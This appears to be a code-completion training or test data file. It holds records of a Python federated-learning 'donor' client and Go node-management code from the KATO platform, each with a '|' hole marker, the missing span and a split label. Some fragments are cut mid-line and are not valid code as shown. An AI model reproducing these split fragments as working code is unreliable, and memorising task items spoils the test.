def __init__(self,filename,ahasTarget, htype, skipc = 0, adelimiter=';', aquotechar ='"',
verbose=False, debug=False,owarn=False):
super().__init__(verbose=verbose,debug=debug)
'''creates the vanilla donor by reading in a file, filles the file
up and will read based on what the donor is created as (hasTarget or no?)'''
self._npdc = NPDController(verbose,debug,owarn)
self.hasTarget = ahasTarget
self._npdc.read( filename, ahasTarget,htype, skipc = skipc, adelimiter = adelimiter,
aquotechar = aquotechar)
# required implementations (the constructor must read in to fill up _mDmat, and
# possibly _mTvct if it hasTarget. the hasTarget must also be set to True if
# the donor truly possess the targets
def conntrain(self):
'''conntrain should begin connection with the central, send in the
_mDmat_train and (if it has the target) _mTvct_train. await response
from server and fill in the received alpha to _mdist_alpha'''
if( self.hasNegotiated() ):
self.verbose("Sending kernel to central")
#dumped = json.dumps( self.kernel.tolist() ) # THIS line is crashing the system (for size 10k)
dumped = serialize( self.kernel )
self.verbose("Total serial dump: {} bytes".format(len(dumped)))
smsg.send( self._msocket, dumped ) #json dump and send the array
# await confirmation
repmsg = self._msocket.recv(4)
if( repmsg.decode('utf-8') == "ACKN" ):
# proceed
if( self.hasTarget ):
# dump the target_train to bytes and send it on over socket
dumped = serialize( self._npdc.get(side='target',batch='train'))
smsg.send( self._msocket, dumped)
# await for alpha
self.info("All Kernels sent. Awaiting central response.")
rcv = smsg.recv( self._msocket )
if(rcv != None):
try:
if( rcv.decode('utf-8') == 'ABRT'):
self.error("Abort request by central.")
self.hasAlpha = False
except UnicodeDecodeError :
self.verbose("Unicode decode failed. Proceeding with deserialization")
self._mdistalpha = deserialize(rcv)
self.info("Distributed alpha received.")
self.hasAlpha=True
self.recover_weights() # perform weight recovery
else:
self.error("rcv is null. Receiving error _mdistalpha")
self.hasAlpha = False
else:
#failed
self.error("Failed to receive ACKN from host. Terminating conntrain")
self.hasAlpha = False
else:
self.error("This donor has not synchronized the params with the central,\
please run negotiate( addr ) first !")
self.hasAlpha = False
return self.hasAlpha
def conntest(self):
'''conntest should begin connection with the central, send in the
_mDmat_train and (if it has the target) _mTvct_train. await response
from server which it will return the error rating of the model
RETURNS True upon No errors. False otherwise'''
if( self.isTrained ):
aggregate = self._npdc.get( side="data",batch="test").dot( self._mweights )
self.verbose("Sending test prediction to central",aggregate.shape)
#self.raw( aggregate )
dumped = serialize( aggregate )
smsg.send( self._msocket, dumped )
repmsg = self._msocket.recv(4)
if( repmsg.decode('utf-8') == "ACKN" ):
#proceed
if( self.hasTarget ):
# dump the target_test to bytes and send it on over socket
dumped = serialize( self._npdc.get(side='target',batch='test'))
smsg.send( self._msocket, dumped )
#await for test results
self.info("All Aggregates sent. Awaiting results.")
rcv = smsg.recv( self._msocket )
if(rcv != None):
if( rcv.decode('utf-8') == 'ABRT'):
self.error("Abort request by central.")
else:
self._mres = json.loads(rcv)
self.verbose("Received DML test results:")
self.info("MSE:", self._mres.get("mse"))
self.info("R2S:", self._mres.get("r2s"))
return True
else:
self.error("rcv is null. Receiving error on _mres")
else:
self.error("Failed to receive ACKN from host. Terminating conntest")
else:
self.error("Weights not available. Is the donor trained ?")
return False
def connpred(self):
#TODO: figure out how to implement this
pass
def recover_weights(self, colmajor=False):
'''recovers the weight'''
if( self.hasAlpha ):
ool = (1/self._mnegform.primary['rrlambda'])
self.debug("OOL (lval):",ool)
if( type(ool) != float and type(ool) != int):
self.warn("OOL not a float or int")
if( not colmajor ):
self._mweights = ool*self._npdc.get(\
side="data",batch="train").transpose().dot(\
self._mdistalpha)
else:
self._mweights = ool*self._npdc.get(\
side="data",batch="train").dot(\
self._mdistalpha)
if( type(self._mweights) == numpy.ndarray ):
self.isTrained = True
self.info("Weights recovered successfully",self._mweights.shape)
self.debug("Weights array:")
self.raw( self._mweights )
else:
self.isTrained = False
else:
self.isTrained = False
# common functions
def | (self,ahostaddr):
'''start negotation, first sends in the donor's own prepared negform to inform the
central about the number of entries/features, it is expected that _mDmat is read
from a file/stdin before this
@params ahostaddr - a tuple ('localhost',portnumber i.e 8000)'''
_mnegform = NegForm(self) #creates the negotiation form
self.verbose("Negform created. Beginning Negotation...")
try:
negstr = json.dumps(_mnegform.primary) #obtains the primary neg data
self._msocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._msocket.connect( ahostaddr ) #attempting to connect to the host (central)
self.debug("Host connected. Sending negstr")
smsg.send( self._msocket, negstr )
self.debug("Negotiation form sent to central. Awaiting synchronization")
self._mnegform = NegForm( json.loads( smsg.recv( self._msocket ) ) )
self.info("Synchronized form:")
self._mnegform.display()
self.partition_internals( self._mnegform.primary["bsize"] )
self.kernel = self._npdc.computeKernel()
if not type(self.kernel) == numpy.ndarray:
self.warn("Kernel computational error!")
else:
self.verbose("Partitioned and computed the kernel",self.kernel.shape)
except Exception as e:
self.expt(str(e),traceback.format_exc())
finally:
return self.hasNegotiated()
##############################################################################################
# These are common throughout almost all implementation and thus are implemented in the ABC
# updated: migrated from the conceptual class to this.
##############################################################################################
def display_internals(self):
'''invokes a display command to display the internal content using any data controllers'''
if self._npdc is not None:
self._npdc.show()
if self._mnegform is not None:
self._mnegform.display()
def partition_internals(self, s_point):
'''invokes a partition command to perform splitting of the data set into the train/test'''
if self._npdc is not None:
self._npdc.batch(s_point)
else:
self.error("Failed to partition. NPDC is null!")
def normalize_internals(self):
'''perform normalization on the internal dataset, please call partition again'''
if self._npdc is not None:
self._npdc.stdnorm()
else:
self.error("Failed to normalize. NPDC is null!")
def sizeof_internals(self):
if self._npdc is not None:
return self._npdc.size()
else:
self.error("Failed to obtain sizes. NPDC is null!")
def shutdown_connections(self):
try:
self._msocket.close()
except Exception as e:
self.expt(str(e))
| negotiate | identifier_name |
vanilla.py | # vanilla.py (DONOR)
# vanilla donor is the vanilla version of a donor
# that is, it uses unencrypted sockets, no SSL/TLS
# and performs the most basic operations (generic)
from . import ConceptDonor
import csv, json
import numpy, pandas
import socket
import traceback
from io import StringIO
import traceback
# sklearn
from sklearn import preprocessing
# local
from preproc.aux import serialize, deserialize
import preproc.negotiate as negotiate
import preproc.controller as controller
NPDController = controller.NPDController
NegForm = negotiate.NegForm
import pyioneer.network.tcp.smsg as smsg
class VanillaDonor(ConceptDonor):
# dimension of the target. for multivariate, this > 1
tdim = 1
compd = numpy.double
def __init__(self,filename,ahasTarget, htype, skipc = 0, adelimiter=';', aquotechar ='"',
verbose=False, debug=False,owarn=False):
super().__init__(verbose=verbose,debug=debug)
'''creates the vanilla donor by reading in a file, filles the file
up and will read based on what the donor is created as (hasTarget or no?)'''
self._npdc = NPDController(verbose,debug,owarn)
self.hasTarget = ahasTarget
self._npdc.read( filename, ahasTarget,htype, skipc = skipc, adelimiter = adelimiter,
aquotechar = aquotechar)
# required implementations (the constructor must read in to fill up _mDmat, and
# possibly _mTvct if it hasTarget. the hasTarget must also be set to True if
# the donor truly possess the targets
def conntrain(self):
'''conntrain should begin connection with the central, send in the
_mDmat_train and (if it has the target) _mTvct_train. await response
from server and fill in the received alpha to _mdist_alpha'''
if( self.hasNegotiated() ):
self.verbose("Sending kernel to central")
#dumped = json.dumps( self.kernel.tolist() ) # THIS line is crashing the system (for size 10k)
dumped = serialize( self.kernel )
self.verbose("Total serial dump: {} bytes".format(len(dumped)))
smsg.send( self._msocket, dumped ) #json dump and send the array
# await confirmation
repmsg = self._msocket.recv(4)
if( repmsg.decode('utf-8') == "ACKN" ):
# proceed
if( self.hasTarget ):
# dump the target_train to bytes and send it on over socket
dumped = serialize( self._npdc.get(side='target',batch='train'))
smsg.send( self._msocket, dumped)
# await for alpha
self.info("All Kernels sent. Awaiting central response.")
rcv = smsg.recv( self._msocket )
if(rcv != None):
try:
if( rcv.decode('utf-8') == 'ABRT'):
self.error("Abort request by central.")
self.hasAlpha = False
except UnicodeDecodeError :
self.verbose("Unicode decode failed. Proceeding with deserialization")
self._mdistalpha = deserialize(rcv)
self.info("Distributed alpha received.")
self.hasAlpha=True
self.recover_weights() # perform weight recovery
else:
self.error("rcv is null. Receiving error _mdistalpha") | self.error("Failed to receive ACKN from host. Terminating conntrain")
self.hasAlpha = False
else:
self.error("This donor has not synchronized the params with the central,\
please run negotiate( addr ) first !")
self.hasAlpha = False
return self.hasAlpha
def conntest(self):
'''conntest should begin connection with the central, send in the
_mDmat_train and (if it has the target) _mTvct_train. await response
from server which it will return the error rating of the model
RETURNS True upon No errors. False otherwise'''
if( self.isTrained ):
aggregate = self._npdc.get( side="data",batch="test").dot( self._mweights )
self.verbose("Sending test prediction to central",aggregate.shape)
#self.raw( aggregate )
dumped = serialize( aggregate )
smsg.send( self._msocket, dumped )
repmsg = self._msocket.recv(4)
if( repmsg.decode('utf-8') == "ACKN" ):
#proceed
if( self.hasTarget ):
# dump the target_test to bytes and send it on over socket
dumped = serialize( self._npdc.get(side='target',batch='test'))
smsg.send( self._msocket, dumped )
#await for test results
self.info("All Aggregates sent. Awaiting results.")
rcv = smsg.recv( self._msocket )
if(rcv != None):
if( rcv.decode('utf-8') == 'ABRT'):
self.error("Abort request by central.")
else:
self._mres = json.loads(rcv)
self.verbose("Received DML test results:")
self.info("MSE:", self._mres.get("mse"))
self.info("R2S:", self._mres.get("r2s"))
return True
else:
self.error("rcv is null. Receiving error on _mres")
else:
self.error("Failed to receive ACKN from host. Terminating conntest")
else:
self.error("Weights not available. Is the donor trained ?")
return False
def connpred(self):
#TODO: figure out how to implement this
pass
def recover_weights(self, colmajor=False):
'''recovers the weight'''
if( self.hasAlpha ):
ool = (1/self._mnegform.primary['rrlambda'])
self.debug("OOL (lval):",ool)
if( type(ool) != float and type(ool) != int):
self.warn("OOL not a float or int")
if( not colmajor ):
self._mweights = ool*self._npdc.get(\
side="data",batch="train").transpose().dot(\
self._mdistalpha)
else:
self._mweights = ool*self._npdc.get(\
side="data",batch="train").dot(\
self._mdistalpha)
if( type(self._mweights) == numpy.ndarray ):
self.isTrained = True
self.info("Weights recovered successfully",self._mweights.shape)
self.debug("Weights array:")
self.raw( self._mweights )
else:
self.isTrained = False
else:
self.isTrained = False
# common functions
def negotiate(self,ahostaddr):
'''start negotation, first sends in the donor's own prepared negform to inform the
central about the number of entries/features, it is expected that _mDmat is read
from a file/stdin before this
@params ahostaddr - a tuple ('localhost',portnumber i.e 8000)'''
_mnegform = NegForm(self) #creates the negotiation form
self.verbose("Negform created. Beginning Negotation...")
try:
negstr = json.dumps(_mnegform.primary) #obtains the primary neg data
self._msocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._msocket.connect( ahostaddr ) #attempting to connect to the host (central)
self.debug("Host connected. Sending negstr")
smsg.send( self._msocket, negstr )
self.debug("Negotiation form sent to central. Awaiting synchronization")
self._mnegform = NegForm( json.loads( smsg.recv( self._msocket ) ) )
self.info("Synchronized form:")
self._mnegform.display()
self.partition_internals( self._mnegform.primary["bsize"] )
self.kernel = self._npdc.computeKernel()
if not type(self.kernel) == numpy.ndarray:
self.warn("Kernel computational error!")
else:
self.verbose("Partitioned and computed the kernel",self.kernel.shape)
except Exception as e:
self.expt(str(e),traceback.format_exc())
finally:
return self.hasNegotiated()
##############################################################################################
# These are common throughout almost all implementation and thus are implemented in the ABC
# updated: migrated from the conceptual class to this.
##############################################################################################
def display_internals(self):
'''invokes a display command to display the internal content using any data controllers'''
if self._npdc is not None:
self._npdc.show()
if self._mnegform is not None:
self._mnegform.display()
def partition_internals(self, s_point):
'''invokes a partition command to perform splitting of the data set into the train/test'''
if self._npdc is not None:
self._npdc.batch(s_point)
else:
self.error("Failed to partition. NPDC is null!")
def normalize_internals(self):
'''perform normalization on the internal dataset, please call partition again'''
if self._npdc is not None:
self._npdc.stdnorm()
else:
self.error("Failed to normalize. NPDC is null!")
def sizeof_internals(self):
if self._npdc is not None:
return self._npdc.size()
else:
self.error("Failed to obtain sizes. NPDC is null!")
def shutdown_connections(self):
try:
self._msocket.close()
except Exception as e:
self.expt(str(e)) | self.hasAlpha = False
else:
#failed | random_line_split |
node.go | // KATO, Application Management Platform
// Copyright (C) 2021 Gridworkz Co., Ltd.
// Permission is hereby granted, free of charge, to any person obtaining a copy of this
// software and associated documentation files (the "Software"), to deal in the Software
// without restriction, including without limitation the rights to use, copy, modify, merge,
// publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons
// to whom the Software is furnished to do so, subject to the following conditions:
// The above copyright notice and this permission notice shall be included in all copies or
// substantial portions of the Software.
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
// INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
// PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE
// FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
// ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
package client
import (
"fmt"
"strings"
"time"
client "github.com/coreos/etcd/clientv3"
"github.com/coreos/etcd/mvcc/mvccpb"
conf "github.com/gridworkz/kato/cmd/node/option"
"github.com/gridworkz/kato/node/core/store"
"github.com/gridworkz/kato/util"
"github.com/pquerna/ffjson/ffjson"
"github.com/sirupsen/logrus"
v1 "k8s.io/api/core/v1"
)
//LabelOS - node label about os
var LabelOS = "beta.kubernetes.io/os"
var LabelGPU = "beta.kato.com/gpushare"
//APIHostNode
type APIHostNode struct {
ID string `json:"uuid" validate:"uuid"`
HostName string `json:"host_name" validate:"host_name"`
InternalIP string `json:"internal_ip" validate:"internal_ip|ip"`
ExternalIP string `json:"external_ip" validate:"external_ip|ip"`
RootPass string `json:"root_pass,omitempty"`
Privatekey string `json:"private_key,omitempty"`
Role HostRule `json:"role" validate:"role|required"`
PodCIDR string `json:"podCIDR"`
AutoInstall bool `json:"auto_install"`
Labels map[string]string `json:"labels"`
}
//Clone
func (a APIHostNode) Clone() *HostNode {
hn := &HostNode{
ID: a.ID,
HostName: a.HostName,
InternalIP: a.InternalIP,
ExternalIP: a.ExternalIP,
RootPass: a.RootPass,
KeyPath: a.Privatekey,
Role: a.Role,
Labels: map[string]string{"kato_node_hostname": a.HostName},
CustomLabels: map[string]string{},
NodeStatus: NodeStatus{Status: "not_installed", Conditions: make([]NodeCondition, 0)},
Status: "not_installed",
PodCIDR: a.PodCIDR,
//node default unscheduler
Unschedulable: true,
}
return hn
}
//HostNode - kato node entity
type HostNode struct {
ID string `json:"uuid"`
HostName string `json:"host_name"`
CreateTime time.Time `json:"create_time"`
InternalIP string `json:"internal_ip"`
ExternalIP string `json:"external_ip"`
RootPass string `json:"root_pass,omitempty"`
KeyPath string `json:"key_path,omitempty"` //Management node key file path
AvailableMemory int64 `json:"available_memory"`
AvailableCPU int64 `json:"available_cpu"`
Mode string `json:"mode"`
Role HostRule `json:"role"` //compute, manage, storage, gateway
Status string `json:"status"`
Labels map[string]string `json:"labels"` // system labels
CustomLabels map[string]string `json:"custom_labels"` // custom labels
Unschedulable bool `json:"unschedulable"` // Settings
PodCIDR string `json:"podCIDR"`
NodeStatus NodeStatus `json:"node_status"`
}
//Resource
type Resource struct {
CPU int `json:"cpu"`
MemR int `json:"mem"`
}
// NodePodResource -
type NodePodResource struct {
AllocatedResources `json:"allocatedresources"`
Resource `json:"allocatable"`
}
// AllocatedResources -
type AllocatedResources struct {
CPURequests int64
CPULimits int64
MemoryRequests int64
MemoryLimits int64
MemoryRequestsR string
MemoryLimitsR string
CPURequestsR string
CPULimitsR string
}
//NodeStatus
type NodeStatus struct {
//worker maintenance
Version string `json:"version"`
//worker maintenance example: unscheduler, offline
//Initiate a recommendation operation to the master based on the node state
AdviceAction []string `json:"advice_actions"`
//worker maintenance
Status string `json:"status"` //installed running offline unknown
//master maintenance
CurrentScheduleStatus bool `json:"current_scheduler"`
//master maintenance
NodeHealth bool `json:"node_health"`
//worker maintenance
NodeUpdateTime time.Time `json:"node_update_time"`
//master maintenance
KubeUpdateTime time.Time `json:"kube_update_time"`
//worker maintenance node progress down time
LastDownTime time.Time `json:"down_time"`
//worker and master maintenance
Conditions []NodeCondition `json:"conditions,omitempty"`
//master maintenance
KubeNode *v1.Node
//worker and master maintenance
NodeInfo NodeSystemInfo `json:"nodeInfo,omitempty" protobuf:"bytes,7,opt,name=nodeInfo"`
}
//UpdateK8sNodeStatus update kato node status by k8s node
func (n *HostNode) UpdateK8sNodeStatus(k8sNode v1.Node) {
status := k8sNode.Status
n.UpdataK8sCondition(status.Conditions)
n.NodeStatus.NodeInfo = NodeSystemInfo{
MachineID: status.NodeInfo.MachineID,
SystemUUID: status.NodeInfo.SystemUUID,
BootID: status.NodeInfo.BootID,
KernelVersion: status.NodeInfo.KernelVersion,
OSImage: status.NodeInfo.OSImage,
OperatingSystem: status.NodeInfo.OperatingSystem,
ContainerRuntimeVersion: status.NodeInfo.ContainerRuntimeVersion,
Architecture: status.NodeInfo.Architecture,
}
}
// MergeLabels merges custom lables into labels.
func (n *HostNode) MergeLabels() map[string]string {
// TODO: Parallel
labels := make(map[string]string, len(n.Labels)+len(n.CustomLabels))
// copy labels
for k, v := range n.Labels {
labels[k] = v
}
for k, v := range n.CustomLabels {
if _, ok := n.Labels[k]; !ok {
labels[k] = v
}
}
return labels
}
// NodeSystemInfo is a set of ids/uuids to uniquely identify the node.
type NodeSystemInfo struct {
// MachineID reported by the node. For unique machine identification
// in the cluster this field is preferred. Learn more from man(5)
// machine-id: http://man7.org/linux/man-pages/man5/machine-id.5.html
MachineID string `json:"machineID"`
// SystemUUID reported by the node. For unique machine identification
// MachineID is preferred. This field is specific to Red Hat hosts
// https://access.redhat.com/documentation/en-US/Red_Hat_Subscription_Management/1/html/RHSM/getting-system-uuid.html
SystemUUID string `json:"systemUUID"`
// Boot ID reported by the node.
BootID string `json:"bootID" protobuf:"bytes,3,opt,name=bootID"`
// Kernel Version reported by the node from 'uname -r' (e.g. 3.16.0-0.bpo.4-amd64).
KernelVersion string `json:"kernelVersion" `
// OS Image reported by the node from /etc/os-release (e.g. Debian GNU/Linux 7 (wheezy)).
OSImage string `json:"osImage"`
// ContainerRuntime Version reported by the node through runtime remote API (e.g. docker://1.5.0).
ContainerRuntimeVersion string `json:"containerRuntimeVersion"`
// The Operating System reported by the node
OperatingSystem string `json:"operatingSystem"`
// The Architecture reported by the node
Architecture string `json:"architecture"`
MemorySize uint64 `json:"memorySize"`
NumCPU int64 `json:"cpu_num"`
}
const (
//Running node running status
Running = "running"
//Offline node offline status
Offline = "offline"
//Unknown node unknown status
Unknown = "unknown"
//Error node error status
Error = "error"
//Init node init status
Init = "init"
//InstallSuccess node install success status
InstallSuccess = "install_success"
//InstallFailed node install failure status
InstallFailed = "install_failed"
//Installing node installing status
Installing = "installing"
//NotInstalled node not install status
NotInstalled = "not_installed"
)
//Decode - decode node info
func (n *HostNode) Decode(data []byte) error {
if err := ffjson.Unmarshal(data, n); err != nil {
logrus.Error("decode node info error:", err.Error())
return err
}
return nil
}
//NodeList
type NodeList []*HostNode
func (list NodeList) Len() int {
return len(list)
}
func (list NodeList) Less(i, j int) bool {
return list[i].InternalIP < list[j].InternalIP
}
func (list NodeList) Swap(i, j int) {
var temp = list[i]
list[i] = list[j]
list[j] = temp
}
//GetNodeFromKV - parse node information from etcd
func GetNodeFromKV(kv *mvccpb.KeyValue) *HostNode {
var node HostNode
if err := ffjson.Unmarshal(kv.Value, &node); err != nil {
logrus.Error("parse node info error:", err.Error())
return nil
}
return &node
}
//UpdataK8sCondition - update the status of the k8s node to the kato node
func (n *HostNode) UpdataK8sCondition(conditions []v1.NodeCondition) {
for _, con := range conditions {
var rbcon NodeCondition
if NodeConditionType(con.Type) == "Ready" {
rbcon = NodeCondition{
Type: KubeNodeReady,
Status: ConditionStatus(con.Status),
LastHeartbeatTime: con.LastHeartbeatTime.Time,
LastTransitionTime: con.LastTransitionTime.Time,
Reason: con.Reason,
Message: con.Message,
}
} else {
if con.Status != v1.ConditionFalse {
rbcon = NodeCondition{
Type: KubeNodeReady,
Status: ConditionFalse,
LastHeartbeatTime: con.LastHeartbeatTime.Time,
LastTransitionTime: con.LastTransitionTime.Time,
Reason: con.Reason,
Message: con.Message,
}
}
}
n.UpdataCondition(rbcon)
}
}
//DeleteCondition
func (n *HostNode) DeleteCondition(types ...NodeConditionType) {
for _, t := range types {
for i, c := range n.NodeStatus.Conditions {
if c.Type.Compare(t) {
n.NodeStatus.Conditions = append(n.NodeStatus.Conditions[:i], n.NodeStatus.Conditions[i+1:]...)
break
}
}
}
}
// UpdateReadyStatus
func (n *HostNode) UpdateReadyStatus() {
var status = ConditionTrue
var Reason, Message string
for _, con := range n.NodeStatus.Conditions {
if con.Status != ConditionTrue && con.Type != "" && con.Type != NodeReady {
logrus.Debugf("because %s id false, will set node %s(%s) health is false", con.Type, n.ID, n.InternalIP)
status = ConditionFalse
Reason = con.Reason
Message = con.Message
break
}
}
n.GetAndUpdateCondition(NodeReady, status, Reason, Message)
}
//GetCondition
func (n *HostNode) | (ctype NodeConditionType) *NodeCondition {
for _, con := range n.NodeStatus.Conditions {
if con.Type.Compare(ctype) {
return &con
}
}
return nil
}
// GetAndUpdateCondition get old condition and update it, if old condition is nil and then create it
func (n *HostNode) GetAndUpdateCondition(condType NodeConditionType, status ConditionStatus, reason, message string) {
oldCond := n.GetCondition(condType)
now := time.Now()
var lastTransitionTime time.Time
if oldCond == nil {
lastTransitionTime = now
} else {
if oldCond.Status != status {
lastTransitionTime = now
} else {
lastTransitionTime = oldCond.LastTransitionTime
}
}
cond := NodeCondition{
Type: condType,
Status: status,
LastHeartbeatTime: now,
LastTransitionTime: lastTransitionTime,
Reason: reason,
Message: message,
}
n.UpdataCondition(cond)
}
//UpdataCondition
func (n *HostNode) UpdataCondition(conditions ...NodeCondition) {
for _, newcon := range conditions {
if newcon.Type == "" {
continue
}
var update bool
if n.NodeStatus.Conditions != nil {
for i, con := range n.NodeStatus.Conditions {
if con.Type.Compare(newcon.Type) {
n.NodeStatus.Conditions[i] = newcon
update = true
break
}
}
}
if !update {
n.NodeStatus.Conditions = append(n.NodeStatus.Conditions, newcon)
}
}
}
//HostRule
type HostRule []string
//SupportNodeRule
var SupportNodeRule = []string{ComputeNode, ManageNode, StorageNode, GatewayNode}
//ComputeNode
var ComputeNode = "compute"
//ManageNode
var ManageNode = "manage"
//StorageNode
var StorageNode = "storage"
//GatewayNode
var GatewayNode = "gateway"
//HasRule
func (h HostRule) HasRule(rule string) bool {
for _, v := range h {
if v == rule {
return true
}
}
return false
}
func (h HostRule) String() string {
return strings.Join(h, ",")
}
//Add role
func (h *HostRule) Add(role ...string) {
for _, r := range role {
if !util.StringArrayContains(*h, r) {
*h = append(*h, r)
}
}
}
//Validation - host rule validation
func (h HostRule) Validation() error {
if len(h) == 0 {
return fmt.Errorf("node rule cannot be enpty")
}
for _, role := range h {
if !util.StringArrayContains(SupportNodeRule, role) {
return fmt.Errorf("node role %s can not be supported", role)
}
}
return nil
}
//NodeConditionType
type NodeConditionType string
// These are valid conditions of node.
const (
// NodeReady means this node is working
NodeReady NodeConditionType = "Ready"
KubeNodeReady NodeConditionType = "KubeNodeReady"
NodeUp NodeConditionType = "NodeUp"
// InstallNotReady means the installation task was not completed in this node.
InstallNotReady NodeConditionType = "InstallNotReady"
OutOfDisk NodeConditionType = "OutOfDisk"
MemoryPressure NodeConditionType = "MemoryPressure"
DiskPressure NodeConditionType = "DiskPressure"
PIDPressure NodeConditionType = "PIDPressure"
)
var masterCondition = []NodeConditionType{NodeReady, KubeNodeReady, NodeUp, InstallNotReady, OutOfDisk, MemoryPressure, DiskPressure, PIDPressure}
//IsMasterCondition Whether it is a preset condition of the system
func IsMasterCondition(con NodeConditionType) bool {
for _, c := range masterCondition {
if c.Compare(con) {
return true
}
}
return false
}
//Compare
func (nt NodeConditionType) Compare(ent NodeConditionType) bool {
return string(nt) == string(ent)
}
//ConditionStatus
type ConditionStatus string
// These are valid condition statuses. "ConditionTrue" means a resource is in the condition.
// "ConditionFalse" means a resource is not in the condition. "ConditionUnknown" means kubernetes
// can't decide if a resource is in the condition or not. In the future, we could add other
// intermediate conditions, e.g. ConditionDegraded.
const (
ConditionTrue ConditionStatus = "True"
ConditionFalse ConditionStatus = "False"
ConditionUnknown ConditionStatus = "Unknown"
)
// NodeCondition contains condition information for a node.
type NodeCondition struct {
// Type of node condition.
Type NodeConditionType `json:"type" `
// Status of the condition, one of True, False, Unknown.
Status ConditionStatus `json:"status" `
// Last time we got an update on a given condition.
// +optional
LastHeartbeatTime time.Time `json:"lastHeartbeatTime,omitempty" `
// Last time the condition transit from one status to another.
// +optional
LastTransitionTime time.Time `json:"lastTransitionTime,omitempty" `
// (brief) reason for the condition's last transition.
// +optional
Reason string `json:"reason,omitempty"`
// Human readable message indicating details about last transition.
// +optional
Message string `json:"message,omitempty"`
}
//String
func (n *HostNode) String() string {
res, _ := ffjson.Marshal(n)
return string(res)
}
//Update node info
func (n *HostNode) Update() (*client.PutResponse, error) {
savenode := *n
savenode.NodeStatus.KubeNode = nil
return store.DefalutClient.Put(conf.Config.NodePath+"/"+n.ID, savenode.String())
}
//DeleteNode
func (n *HostNode) DeleteNode() (*client.DeleteResponse, error) {
return store.DefalutClient.Delete(conf.Config.NodePath + "/" + n.ID)
}
//DelEndpoints
func (n *HostNode) DelEndpoints() {
keys, err := n.listEndpointKeys()
if err != nil {
logrus.Warningf("error deleting endpoints: %v", err)
return
}
for _, key := range keys {
_, err := store.DefalutClient.Delete(key)
if err != nil {
logrus.Warnf("key: %s; error delete endpoints: %v", key, err)
}
}
}
func (n *HostNode) listEndpointKeys() ([]string, error) {
resp, err := store.DefalutClient.Get(KatoEndpointPrefix, client.WithPrefix())
if err != nil {
return nil, fmt.Errorf("prefix: %s; error list kato endpoint keys by prefix: %v", KatoEndpointPrefix, err)
}
var res []string
for _, kv := range resp.Kvs {
key := string(kv.Key)
if strings.Contains(key, n.InternalIP) {
res = append(res, key)
}
}
return res, nil
}
| GetCondition | identifier_name |
node.go | // KATO, Application Management Platform
// Copyright (C) 2021 Gridworkz Co., Ltd.
// Permission is hereby granted, free of charge, to any person obtaining a copy of this
// software and associated documentation files (the "Software"), to deal in the Software
// without restriction, including without limitation the rights to use, copy, modify, merge,
// publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons
// to whom the Software is furnished to do so, subject to the following conditions:
// The above copyright notice and this permission notice shall be included in all copies or
// substantial portions of the Software.
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
// INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
// PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE
// FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
// ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
package client
import (
"fmt"
"strings"
"time"
client "github.com/coreos/etcd/clientv3"
"github.com/coreos/etcd/mvcc/mvccpb"
conf "github.com/gridworkz/kato/cmd/node/option"
"github.com/gridworkz/kato/node/core/store"
"github.com/gridworkz/kato/util"
"github.com/pquerna/ffjson/ffjson"
"github.com/sirupsen/logrus"
v1 "k8s.io/api/core/v1"
)
//LabelOS - node label about os
var LabelOS = "beta.kubernetes.io/os"
var LabelGPU = "beta.kato.com/gpushare"
//APIHostNode
type APIHostNode struct {
ID string `json:"uuid" validate:"uuid"`
HostName string `json:"host_name" validate:"host_name"`
InternalIP string `json:"internal_ip" validate:"internal_ip|ip"`
ExternalIP string `json:"external_ip" validate:"external_ip|ip"`
RootPass string `json:"root_pass,omitempty"`
Privatekey string `json:"private_key,omitempty"`
Role HostRule `json:"role" validate:"role|required"`
PodCIDR string `json:"podCIDR"`
AutoInstall bool `json:"auto_install"`
Labels map[string]string `json:"labels"`
}
//Clone
func (a APIHostNode) Clone() *HostNode {
hn := &HostNode{
ID: a.ID,
HostName: a.HostName,
InternalIP: a.InternalIP,
ExternalIP: a.ExternalIP,
RootPass: a.RootPass,
KeyPath: a.Privatekey,
Role: a.Role,
Labels: map[string]string{"kato_node_hostname": a.HostName},
CustomLabels: map[string]string{},
NodeStatus: NodeStatus{Status: "not_installed", Conditions: make([]NodeCondition, 0)},
Status: "not_installed",
PodCIDR: a.PodCIDR,
//node default unscheduler
Unschedulable: true,
}
return hn
}
//HostNode - kato node entity
type HostNode struct {
ID string `json:"uuid"`
HostName string `json:"host_name"`
CreateTime time.Time `json:"create_time"`
InternalIP string `json:"internal_ip"`
ExternalIP string `json:"external_ip"`
RootPass string `json:"root_pass,omitempty"`
KeyPath string `json:"key_path,omitempty"` //Management node key file path
AvailableMemory int64 `json:"available_memory"`
AvailableCPU int64 `json:"available_cpu"`
Mode string `json:"mode"`
Role HostRule `json:"role"` //compute, manage, storage, gateway
Status string `json:"status"`
Labels map[string]string `json:"labels"` // system labels
CustomLabels map[string]string `json:"custom_labels"` // custom labels
Unschedulable bool `json:"unschedulable"` // Settings
PodCIDR string `json:"podCIDR"`
NodeStatus NodeStatus `json:"node_status"`
}
//Resource
type Resource struct {
CPU int `json:"cpu"`
MemR int `json:"mem"`
}
// NodePodResource -
type NodePodResource struct {
AllocatedResources `json:"allocatedresources"`
Resource `json:"allocatable"`
}
// AllocatedResources -
type AllocatedResources struct {
CPURequests int64
CPULimits int64
MemoryRequests int64
MemoryLimits int64
MemoryRequestsR string
MemoryLimitsR string
